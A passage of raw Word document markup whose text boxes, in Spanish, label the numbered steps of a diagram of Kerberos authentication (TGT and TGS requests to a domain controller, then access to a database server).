r41656,-25400l3031617,2754757r38481,-26035l3107055,2702433r35052,-26543l3175508,2649220r11341,-9741l3207004,2622169r29591,-27432l3264408,2567051r49276,-56388l3355340,2453005r34544,-58674l3417824,2334641r21590,-60579l3455416,2212594r10922,-62230l3472561,2087499r1524,-31623l3474707,2024253xem5068659,40068r-305,-444l5066792,37338r-2718,-2667l5028819,14224r-5283,-1524l5015611,10414,4968240,2667,4909693,r-21844,l4841240,1524r-52540,3175l4789132,4699r-52286,4445l4650740,18161r-29972,3556l4496181,37846,4300855,65786r1778,12446l4560951,42164r91186,-11430l4737989,21717r53111,-4395l4841748,14224r46228,-1524l4909439,12700r20561,393l4949063,13970r18389,1435l4967097,15405r16980,1917l4983734,17322r13906,2185l4998847,19773r36614,10681l5044491,35153r355,178l5051476,40068r457,318l5051552,40068r17107,xem5074285,62357r-102,-6096l5073523,51562r-1092,-3937l5072227,46863r-101,-381l5071440,45085r-1600,-3302l5068875,40386r-16942,l5051806,40386r5473,5486l5059057,48488r1042,2058l5060188,50901r305,661l5060366,51562r711,2159l5061369,56261r101,6096l5061204,65405r-76,381l5060962,66294r-2298,9017l5038356,113233r-33794,43104l4975098,188849r-33528,34036l4905375,257810r-37846,35179l4829175,327914r-56134,50165l4755388,393954r-17145,15240l4706747,437896r-2540,2476l4681728,417830r-27051,80772l4735576,471805r-13437,-13462l4713173,449351r2210,-2184l4746752,418719r90932,-81407l4876038,302387r37973,-35306l4950460,232029r33782,-34417l5014087,164719r25146,-30861l5065522,92202r8128,-24130l5074285,62357xem5917819,3495675r-12700,-6350l5841619,3457575r,31750l1983994,3489325r,12700l5841619,3502025r,31750l5905119,3502025r12700,-6350xem6751320,2170684r-508,-39256l6750812,2130806r-1613,-38177l6749161,2091436r-2959,-37973l6746113,2052320r-4445,-38862l6735712,1975269r-7379,-38138l6719189,1899666r-10795,-37211l6695821,1825879r-14478,-36068l6664960,1754124r-18415,-35052l6626098,1684655r-22733,-34036l6578473,1617345r-27178,-32639l6521704,1552702r-32004,-31369l6455283,1490726r-36703,-29972l6379591,1431417r-41021,-28829l6295390,1374394r-45085,-27559l6203188,1319657r-48768,-26670l6103874,1266952r-52324,-25654l5997575,1216152r-55372,-24892l5885180,1167003r-117729,-47752l5644769,1072896r-127000,-45085l5387086,983742,5253228,940435,4979035,855599,4773066,794105r1092,-3657l4782185,763651r-83947,14732l4760341,836676r9093,-30404l4975352,867791r274066,84709l5383022,995807r130556,44069l5640324,1084834r122428,46228l5880227,1178687r56769,24257l5992241,1227582r53721,25146l6098171,1278343r50280,25820l6199136,1331963r44831,25768l6287859,1384630r42545,27864l6372098,1441577r37478,28270l6445783,1499400r35344,31267l6480988,1530667r1473,1321l6503606,1552702r8878,8839l6512725,1561668r28918,31293l6568440,1625219r24511,32639l6614477,1690116r20155,33655l6654038,1760702r15926,34722l6695986,1865553r19228,71578l6715836,1939848r89,204l6722808,1975269r6236,39852l6729082,2015363r4331,38100l6736474,2092629r1612,38177l6738607,2170684r-622,39497l6736232,2249678r-2692,40894l6729857,2331085r-4445,40894l6720078,2413000r-5842,41275l6707505,2495677r-6985,41529l6685331,2619133r-17196,85586l6650863,2788793r12446,2540l6680581,2707259r16891,-84074l6712966,2539365r7112,-41656l6726809,2456180r5842,-41402l6737985,2373503r4572,-41009l6746113,2291588r2794,-40513l6750685,2210689r635,-40005xe" fillcolor="black" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E63B460" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="620BB76A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="768856F7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="677D2C6D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="481E449D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="187"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C3B0DE8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:ind w:left="11126"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54220FBD" wp14:editId="39C2A9D7">
                <wp:extent cx="2400300" cy="462280"/>
                <wp:effectExtent l="9525" t="0" r="0" b="13970"/>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462280"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="4C99DC7A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="181" w:firstLine="218"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>2. DC descifra el mensaje y realiza una verificación si todo está bien</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="54220FBD" id="Textbox 200" o:spid="_x0000_s1116" type="#_x0000_t202" style="width:189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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="4C99DC7A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="181" w:firstLine="218"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>2. DC descifra el mensaje y realiza una verificación si todo está bien</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="10915314" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="224"/>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25728" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7BFA7152" wp14:editId="51DA5D49">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>987552</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>319150</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2425065" cy="462280"/>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065" cy="462280"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="72C2426B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="140" w:firstLine="28"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>1. El nombre de usuario de dominio con la hora actual se envía a DC de forma cifrada</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="7BFA7152" id="Textbox 201" o:spid="_x0000_s1117" type="#_x0000_t202" style="position:absolute;margin-left:77.75pt;margin-top:25.15pt;width:190.95pt;height:36.4pt;z-index:-1569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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="72C2426B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="140" w:firstLine="28"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>1. El nombre de usuario de dominio con la hora actual se envía a DC de forma cifrada</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26240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="41399528" wp14:editId="591BFEFD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3557015</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>704723</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="882650" cy="276225"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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276225"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="08039823" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="59"/>
                              <w:ind w:left="140"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>3. Tengo TGT</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="41399528" id="Textbox 202" o:spid="_x0000_s1118" type="#_x0000_t202" style="position:absolute;margin-left:280.1pt;margin-top:55.5pt;width:69.5pt;height:21.75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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="08039823" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="59"/>
                        <w:ind w:left="140"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>3. Tengo TGT</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26752" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2212197C" wp14:editId="2B688144">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7917180</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1291463</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2903220" cy="460375"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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460375"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="756701C5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="58" w:line="291" w:lineRule="exact"/>
                              <w:ind w:right="3"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>8. Otras solicitudes de validación opcionales con</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0BBBE026" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="291" w:lineRule="exact"/>
                              <w:ind w:left="3" w:right="3"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>se realiza el DC.</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="2212197C" id="Textbox 203" o:spid="_x0000_s1119" type="#_x0000_t202" style="position:absolute;margin-left:623.4pt;margin-top:101.7pt;width:228.6pt;height:36.25pt;z-index:-156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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="756701C5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="58" w:line="291" w:lineRule="exact"/>
                        <w:ind w:right="3"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>8. Otras solicitudes de validación opcionales con</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0BBBE026" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="291" w:lineRule="exact"/>
                        <w:ind w:left="3" w:right="3"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>se realiza el DC.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="322CD8EB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="211"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D8A811D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45883C42" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:ind w:left="8838"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6333D1A9" wp14:editId="55FF36EE">
                <wp:extent cx="1100455" cy="277495"/>
                <wp:effectExtent l="9525" t="0" r="4444" b="8254"/>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277495"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="391F9061" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="60"/>
                              <w:ind w:left="316"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>6. Tengo TGS</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="6333D1A9" id="Textbox 204" o:spid="_x0000_s1120" type="#_x0000_t202" style="width:86.6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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="391F9061" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="60"/>
                        <w:ind w:left="316"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>6. Tengo TGS</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="167C7A3C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="4"/>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27776" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3AEB2FF0" wp14:editId="6B9ADE1B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4047744</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>47861</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1221105" cy="277495"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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277495"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="1818429E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="61"/>
                              <w:ind w:left="197"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>5. Solicitar TGS</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="3AEB2FF0" id="Textbox 205" o:spid="_x0000_s1121" type="#_x0000_t202" style="position:absolute;margin-left:318.7pt;margin-top:3.75pt;width:96.15pt;height:21.85pt;z-index:-1568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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1818429E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="61"/>
                        <w:ind w:left="197"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>5. Solicitar TGS</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="406A037F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E1505B7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47890A82" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="140"/>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28288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F479C6F" wp14:editId="69491415">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4908803</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>266013</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2880360" cy="646430"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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646430"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="71EEF813" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="65" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="405" w:firstLine="148"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>7. Los clientes que utilizan el TGS asignado están autenticados y autorizados para</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="77AFEE67" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="290" w:lineRule="exact"/>
                              <w:ind w:left="1444"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>acceder al servidor de base de datos</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
